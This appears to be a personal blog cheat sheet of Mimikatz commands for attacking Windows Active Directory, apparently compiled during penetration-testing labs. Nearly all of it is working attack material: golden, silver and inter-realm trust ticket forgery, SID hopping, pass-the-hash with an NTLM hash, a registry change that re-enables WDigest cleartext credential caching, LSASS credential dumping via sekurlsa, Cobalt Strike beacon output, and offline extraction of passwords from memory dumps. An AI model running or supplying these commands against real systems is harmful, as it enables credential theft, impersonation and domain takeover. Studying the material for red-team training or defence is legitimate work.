Mimikatz

Mimikatz Inter-realm Trust Abuse

mimikatz lsadump::trust /patch

mimikatz kerberos::golden /user:Administrator /domain:<child domain> /sid:<child domain sid> /sids:<parent domain Enterprise Admins SID> /rc4:<trust ticket RC4 hash> /service:krbtgt /target:<parent domain> /ticket:<ticket to save>

.\asktgs.exe C:\Users\Public\ticket.kirbi CIFS/server.domain.local

.\kirbikator.exe lsa .\CIFS.domain.kirbi

ls \\mcorp-dc.moneycorp.local\c$



Sid Hopping Template


target domain: admin.offshore.com

current (child) domain: dev.admin.offshore.com

child domain sid:

Command for SID Hopping Golden Ticket:

mimikatz kerberos::golden /user:<any user> /domain:<child domain> /sid:<child domain sid> /sids:<sids of enterprise domains in parent> /krbtgt:<krbtgt hash of child> /ptt





Mimikatz Golden Ticket

mimikatz kerberos::golden /user:<username> /domain:<FQDN> /sid:<sid of parent or child domain> /krbtgt:<hash of krbtgt> /ptt

/user: This is the user you want to forge a ticket for
/domain: this is the domain you want to forge a ticket for
/sid: this is the domain’s SID
/krbtgt: this is the KRBTGT Hash

Mimikatz Silver Ticket

mimikatz kerberos::golden /sid:<sid of parent or child domain> /domain:<FQDN> /ptt /target:DC01 /service:cifs /rc4:<NTLM Hash> /user:<FakeUser>


Mimikatz Silver Ticket Command Reference
 
The Mimikatz command to create a golden or silver ticket is “kerberos::golden”
 
  •  /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.
  • /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.
  • /user – username to impersonate
  • /groups (optional) – group RIDs the user is a member of (the first is the primary group)
  • default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).
  • /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
  • /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.
  • /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).
  • /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.
  • /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
  • /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).


Disable mimikatz patch via registry

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Pass The Hash

sekurlsa::pth /user:SQLDEVADMIN /domain:US.FUNCORP.LOCAL /ntlm:ce03434e2f83b99704a631ae56e2146e

All About SIDs

beacon> mimikatz sid::lookup /name:appsvc
[*] Tasked beacon to run mimikatz’s sid::lookup /name:appsvc command
[+] host called home, sent: 961605 bytes
[+] received output:
Name  : appsvc
Type  : User
Domain: ELS-CHILD
SID   : S-1-5-21-23589937-599888933-351157107-1109

beacon> mimikatz sid::lookup /name:uatoperator
[*] Tasked beacon to run mimikatz’s sid::lookup /name:uatoperator command
[+] host called home, sent: 961605 bytes
[+] received output:
Name  : uatoperator
Type  : User
Domain: ELS-CHILD
SID   : S-1-5-21-23589937-599888933-351157107-1110

beacon> mimikatz sid::lookup /sid:S-1-5-21-23589937-599888933-351157107-1118
[*] Tasked beacon to run mimikatz’s sid::lookup /sid:S-1-5-21-23589937-599888933-351157107-1118 command
[+] host called home, sent: 961605 bytes
[+] received output:
SID   : S-1-5-21-23589937-599888933-351157107-1118
Type  : Group
Domain: ELS-CHILD
Name  : PowerShell Remoting

Golden Ticket

kerberos::golden /user:arobbins_da /domain:citadel.covertius.local /sid:S-1-5-21-592301725-3004806419-1885942225 /krbtgt:c1c540cb1f997657f5465e08468725f3 /endin:480 /renewmax:10080 /ptt

arobbins_da is the user
sid is the domain sid of citadel.covertius.local
citadel.covertius.local is the domain
krbtgt is the ticket granting ticket found on the domain controller of through dcsync



In Cobalt Strike Beacon or Mimikatz Command Prompt

mimikatz sekurlsa::<enter something from below, e.g. msv>



mimikatz sekurlsa::msv
mimikatz sekurlsa::wdigest
mimikatz sekurlsa::kerberos  <I’ve seen this pull plain text passwords>
mimikatz sekurlsa::tspkg
mimikatz sekurlsa::livessp
mimikatz sekurlsa::ssp
mimikatz sekurlsa::logonPasswords
mimikatz sekurlsa::minidump
mimikatz sekurlsa::trust
mimikatz sekurlsa::backupkeys
mimikatz sekurlsa::tickets
mimikatz sekurlsa::ekeys
mimikatz sekurlsa::dpapi
mimikatz sekurlsa::credman
mimikatz sekurlsa::
mimikatz sekurlsa::msv  –  Lists LM & NTLM credentials
         wdigest  –  Lists WDigest credentials
        kerberos  –  Lists Kerberos credentials
           tspkg  –  Lists TsPkg credentials
         livessp  –  Lists LiveSSP credentials
             ssp  –  Lists SSP credentials
  logonPasswords  –  Lists all available providers credentials
         process  –  Switch (or reinit) to LSASS process  context
        minidump  –  Switch (or reinit) to LSASS minidump context
             pth  –  Pass-the-hash
          krbtgt  –  krbtgt!
     dpapisystem  –  DPAPI_SYSTEM secret
           trust  –  Antisocial
      backupkeys  –  Preferred Backup Master keys
         tickets  –  List Kerberos tickets
           ekeys  –  List Kerberos Encryption Keys
           dpapi  –  List Cached MasterKeys
         credman  –  List Credentials Manager

Dump Creds from .dmp file with mimikatz and volatility

https://medium.com/@ali.bawazeeer/using-mimikatz-to-get-cleartext-password-from-offline-memory-dump-76ed09fd3330

1. /usr/share/volatility
2. mkdir plugins
3. cd plugins
4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
5. apt-get install python-crypto
6. volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz

Or, alternatively

Run Mimikatz
Type, “sekurlsa::Minidump lsassdump.dmp“
Lastly type, “sekurlsa::logonPasswords“


Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s